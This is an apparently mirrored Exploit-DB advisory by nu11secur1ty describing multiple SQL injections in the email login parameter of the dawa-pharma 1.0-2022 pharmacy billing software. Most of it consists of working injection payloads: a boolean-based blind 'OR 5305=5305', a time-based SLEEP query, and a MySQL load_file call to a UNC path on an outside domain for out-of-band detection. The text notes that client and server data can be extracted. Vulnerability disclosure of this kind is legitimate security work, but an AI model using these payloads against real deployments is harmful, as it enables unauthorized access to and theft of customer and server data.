dawa-pharma 1.0-2022 – Multiple-SQLi

  • 作者: nu11secur1ty
    日期: 2024-02-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51818/
  • ## Title: dawa-pharma-1.0-2022 Multiple-SQLi
    ## Author: nu11secur1ty
    ## Date: 10/12/2023
    ## Vendor: https://www.mayurik.com/
    ## Software: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download
    ## Reference: https://portswigger.net/web-security/sql-injection
    
    
    ## Description:
    The email parameter appears to be vulnerable to SQL injection attacks.
    The payload '+(select
    load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+'
    was submitted in the email parameter. This payload injects a SQL
    sub-query that calls MySQL's load_file function with a UNC file path
    that references a URL on an external domain. The application
    interacted with that domain, indicating that the injected SQL query
    was executed. The attacker can get all the information for the clients
    of this application from the server, and very sensitive information
    for accessing the server by exploiting the vulnerability.
    
    [+]Payload:
    ```MySQL
    ---
    Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: email=-8698' OR 5305=5305-- vvuH&password=mayurik&login=
    
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=mayuri.infospace@gmail.com'+(select
    load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+''
    AND (SELECT 4515 FROM (SELECT(SLEEP(15)))KUth)--
    VRdC&password=mayurik&login=
    ---
    ```
    
    
    ## Reproduce:
    https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/dawa-pharma-1.0-2022
    
    
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    home page: https://www.nu11secur1ty.com/